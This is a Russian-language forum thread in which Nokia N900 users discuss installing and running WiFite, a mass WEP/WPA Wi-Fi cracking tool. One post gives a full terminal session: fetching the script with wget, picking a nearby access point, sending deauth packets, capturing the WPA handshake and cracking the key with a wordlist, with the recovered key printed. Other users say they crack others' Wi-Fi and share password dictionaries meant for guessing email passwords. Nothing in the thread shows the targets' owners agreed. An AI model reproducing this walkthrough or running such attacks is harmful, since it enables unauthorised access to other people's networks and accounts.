Re: WiFiTE
Dominic
Через dpkg -i устанавливал?
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Dominic
Через dpkg -i устанавливал?
Нет... Я deb как то всегда устанавливал кликом по файлу на телефоне... А что этот dpkg -i ltkftn и как правильно ввести команду на установку... ???
Dominic прокрути страницу в самый верх, увидиш ссылку ... http://maemoworld.ru/forum/viewtopic.php?id=570
Dominic прокрути страницу...
Спасиб... Я уже поставил... Проблема была в опечатке, имя пакета вводил не правильно и выдавало ошибку... Все встало... А что изменилось с версии 1.0 до 1.1???
Теория и практика, две разные вещи, вы мну скажите, кто-то ломал точки вафли...
Ибо дачик на н900 не зверь, а порой даже и не стоит заморачиваться, а всеголишь спросить.
Я ничeму нe рaд в мoлчaньи cвeтлыx днeй. Я - Мазандар! И грoм и дoждь друзья мoи тeпepь. В лaдoни гopсть пpичудливыx кaмнeй… Бeзвoдный край… Прoрoкoв слaвить грех тут. Нe лгу сeбe : нe ждeт тaких уcпeх. И я нe стaну никoгдa тaким, кaким хoчу. Тaк умирaeт сaмoмнeньe, нo пуcть живeт сoмнeньe. Oнo и ecть пoкopнocть и пeчaль для днeй людcких. И вce прoйдeт лeгкo, бeз лишнeй бoли. Нa сaмoм дeлe этo хoрoшo, и я дoвoлeн…
Теория и практика, две разные вещи, вы мну скажите, кто-то ломал точки вафли...
Ибо дачик на н900 не зверь, а порой даже и не стоит заморачиваться, а всеголишь спросить.
Я ломал... Смотри ветку aircrack... Нормально ломает... Причем и WEP и WPA (правда WPA с небольшой оговоркой)...
В первом посте добавил пасслист
А это... Ты вообще этой прогой пользовалься?
Еть хоть какой нибудь мануальчик по ее работе...???
ZrX пишет:В первом посте добавил пасслист
А это... Ты вообще этой прогой пользовалься?
Еть хоть какой нибудь мануальчик по ее работе...???
Все же написанно в первом посте! Читай внимательно!
Ага... Только это не то... Я имел ввиду для Оленей... Пошагово на каком нибудь примере...
P.S. Олень - это я...
Ага... Только это не то... Я имел ввиду для Оленей... Пошагово на каком нибудь примере...
P.S. Олень - это я...
Какой мануал запускаешь ждешь побольше подключенных клиентов
жмешь ctrl+c выбираешь жертву по номеру1,2,3,4........или all атаковать всех
дальше прога выполняет все автоматом если повезет KEY FOUND.
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ $ root
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.
Nokia-N900:~# wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
--16:15:43-- http://wifite.googlecode.com/svn/trunk/wifite.py
=> `wifite.py'
Распознаётся wifite.googlecode.com... 66.102.13.82
Устанавливается соединение с wifite.googlecode.com|66.102.13.82|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: 106 652 (104K) [text/plain]
100%[===========================>] 106 652 166.03K/s
16:15:44 (165.87 KB/s) - `wifite.py' сохранён [106652/106652]
Nokia-N900:~# chmod +x wifite.py
Nokia-N900:~# sh /home/user/MyDocs/qwer
Nokia-N900:~# python wifite.py
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled
.;' `;,
.;' ,;' `;, `;, WiFite r62
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \
[+] WARNING: recommended packages/apps were not found macchanger, pyrit
[+] searching for devices in monitor mode...
[+] defaulting to interface "wlan0"
[+] waiting for targets. press Ctrl+C when ready
[0:00:43] 2 targets and 1 clients found
[+] select the number(s) of the target(s) you want to attack:
1. "DSL-2640U" (66dB WPA)
2. "SMKR61" (15dB WPA)
[+] for multiple choices, use dashes for ranges and commas to separate
[+] example: 1-3,5-6 would target targets numbered 1, 2, 3, 5, 6
[+] to attack all access points, type "all"
1
[+] adding "DSL-2640U" to the attack list
[+] in order to crack WPA, you will need to enter a dictionary file
[+] enter the path to the dictionary to use, or "none" to not crack at all:
/root/password.lst
[+] using "/root/password.lst" as wpa wordlist dictionary
[+] estimated maximum wait time is 05 minutes
[+] attacking "DSL-2640U"...
[0:05:00] starting wpa handshake capture
[0:02:26] sent 3 deauth packets; handshake captured! saved as "hs/DSL2640U.cap"
[0:00:00] started cracking WPA key for "DSL-2640U"; using /root/password.lst (82 passwords)
[0:00:01] cracking; 82.44 k/s; 82 keys total; 100% eta: 0:00:00
[0:00:01] cracked "DSL-2640U"! the key is: "ddF769viIwbeLnH"
[+] attack is complete: 1 handshake, 1 cracked
[+] session summary:
-cracked WPA key for "DSL-2640U", the key is: "ddF769viIwbeLnH"
Добавлено: 19.01.2011 17:32:35
ZrX Ты меня чуть-чуть опередил...
Я как раз ее испытывал...
В принципе... Минимум действия с терминалом... Чуть быстрее, чем руками... Прога достойна, чтобы остаться на телефоне...
Не проверил GUI оболочку нужен пакет python-tk .
проверил, в ней не видно кнопки снизу чтобы начать
Не проверил GUI оболочку нужен пакет python-tk .
Так и в чем засада? Надо проверить...
Полезный парольный словарь...
Русские слова, набранные в американской раскладке... Самый используемый словарь для подбора паролей к мылу... В нашем случае тоже будет не лишним...
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.091 секунды (96% PHP — 4% БД) 9 запросов к базе данных